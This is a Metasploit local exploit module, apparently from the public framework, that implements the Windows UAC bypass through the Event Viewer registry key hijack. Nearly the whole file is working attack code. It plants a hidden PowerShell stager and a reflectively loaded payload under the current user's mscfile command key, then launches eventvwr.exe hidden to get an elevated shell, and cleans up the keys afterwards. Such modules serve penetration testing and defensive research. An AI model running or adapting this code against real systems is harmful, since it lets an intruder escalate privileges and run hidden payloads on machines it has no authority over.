1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Exploit::Powershell
10
  include Post::Windows::Priv
11
  include Post::Windows::Registry
12
  include Post::Windows::Runas
13

14
  EVENTVWR_DEL_KEY = 'HKCU\\Software\\Classes\\mscfile'.freeze
15
  EVENTVWR_WRITE_KEY = 'HKCU\\Software\\Classes\\mscfile\\shell\\open\\command'.freeze
16
  EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
17
  EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
18
  EVENTVWR_PATH = '%WINDIR%\\System32\\eventvwr.exe'.freeze
19
  EVENTVWR_WOW64_PATH = '%WINDIR%\\SysWOW64\\eventvwr.exe'.freeze
20
  PSH_PATH = '%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe'.freeze
21
  CMD_MAX_LEN = 2081
22

23
  def initialize(info = {})
24
    super(
25
      update_info(
26
        info,
27
        'Name' => 'Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)',
28
        'Description' => %q{
29
          This module will bypass Windows UAC by hijacking a special key in the Registry under
30
          the current user hive, and inserting a custom command that will get invoked when
31
          the Windows Event Viewer is launched. It will spawn a second shell that has the UAC
32
          flag turned off.
33

34
          This module modifies a registry key, but cleans up the key once the payload has
35
          been invoked.
36

37
          The module does not require the architecture of the payload to match the OS. If
38
          specifying EXE::Custom your DLL should call ExitProcess() after starting your
39
          payload in a separate process.
40
        },
41
        'License' => MSF_LICENSE,
42
        'Author' => [
43
          'Matt Nelson', # UAC bypass discovery and research
44
          'Matt Graeber',   # UAC bypass discovery and research
45
          'OJ Reeves'       # MSF module
46
        ],
47
        'Platform' => ['win'],
48
        'SessionTypes' => ['meterpreter'],
49
        'Targets' => [
50
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
51
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
52
        ],
53
        'DefaultTarget' => 0,
54
        'References' => [
55
          ['URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/'],
56
          ['URL', 'https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1']
57
        ],
58
        'DisclosureDate' => '2016-08-15',
59
        'Compat' => {
60
          'Meterpreter' => {
61
            'Commands' => %w[
62
              stdapi_railgun_api
63
            ]
64
          }
65
        },
66
        'Notes' => {
67
          'Reliability' => UNKNOWN_RELIABILITY,
68
          'Stability' => UNKNOWN_STABILITY,
69
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
70
        }
71
      )
72
    )
73
  end
74

75
  def check
76
    version = get_version_info
77
    if version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win10_1607)
78
      Exploit::CheckCode::Appears
79
    else
80
      Exploit::CheckCode::Safe
81
    end
82
  end
83

84
  def exploit
85
    eventvwr_cmd = EVENTVWR_PATH
86
    registry_view = REGISTRY_VIEW_NATIVE
87

88
    # Make sure we have a sane payload configuration
89

90
    if session.arch != target.arch.first
91
      fail_with(Failure::NoTarget, 'Session and Target arch must match')
92
    end
93
    if sysinfo['Architecture'] == ARCH_X64
94
      vprint_status('Target is x64')
95
      if session.arch == ARCH_X86
96
        vprint_status('Detected Target/Session mismatch.  Syswow Required.')
97
        registry_view = REGISTRY_VIEW_64_BIT
98
        eventvwr_cmd = EVENTVWR_WOW64_PATH
99
      end
100
    elsif target_arch.first == ARCH_X64
101
      # if we're on x86, we can't handle x64 payloads
102
      fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
103
    end
104

105
    # Validate that we can actually do things before we bother
106
    # doing any more work
107
    check_permissions!
108

109
    case get_uac_level
110
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
111
        UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
112
        UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
113
      fail_with(Failure::NotVulnerable,
114
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
115
    when UAC_DEFAULT
116
      print_good('UAC is set to Default')
117
      print_good('BypassUAC can bypass this setting, continuing...')
118
    when UAC_NO_PROMPT
119
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
120
      shell_execute_exe
121
      return
122
    end
123

124
    payload_value = rand_text_alpha(8)
125
    psh_path = expand_path(PSH_PATH.to_s)
126
    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
127
    vprint_status("template_path #{template_path}")
128
    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload.encoded)
129

130
    psh_stager = "\"IEX (Get-ItemProperty -Path #{EVENTVWR_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
131
    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
132

133
    existing = registry_getvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, registry_view) || ''
134

135
    if existing.empty?
136
      registry_createkey(EVENTVWR_WRITE_KEY, registry_view)
137
    end
138

139
    print_status('Configuring payload and stager registry keys ...')
140
    registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
141
    registry_setvaldata(EVENTVWR_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
142

143
    cmd_path = expand_path(eventvwr_cmd.to_s)
144
    print_status("Executing payload: #{cmd_path}")
145
    result = client.railgun.shell32.ShellExecuteA(nil, 'open', cmd_path, nil, nil, 'SW_HIDE')
146

147
    if result['return'] > 32
148
      print_good('eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.')
149
      Rex.sleep(10)
150
    else
151
      print_error("eventvwr.exe execution failed with Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}")
152
    end
153

154
    handler(client)
155

156
    print_status('Cleaning up registry keys ...')
157
    if existing.empty?
158
      registry_deletekey(EVENTVWR_DEL_KEY, registry_view)
159
    else
160
      registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
161
      registry_deleteval(EVENTVWR_WRITE_KEY, payload_value, registry_view)
162
    end
163
  end
164

165
  def check_permissions!
166
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
167

168
    # Check if you are an admin
169
    vprint_status('Checking admin status...')
170
    admin_group = is_in_admin_group?
171

172
    unless check == Exploit::CheckCode::Appears
173
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
174
    end
175

176
    unless is_in_admin_group?
177
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
178
    end
179

180
    print_status('UAC is Enabled, checking level...')
181
    if admin_group.nil?
182
      print_error('Either whoami is not there or failed to execute')
183
      print_error('Continuing under assumption you already checked...')
184
    elsif admin_group
185
      print_good('Part of Administrators group! Continuing...')
186
    else
187
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
188
    end
189

190
    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
191
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
192
    end
193
  end
194
end
195

196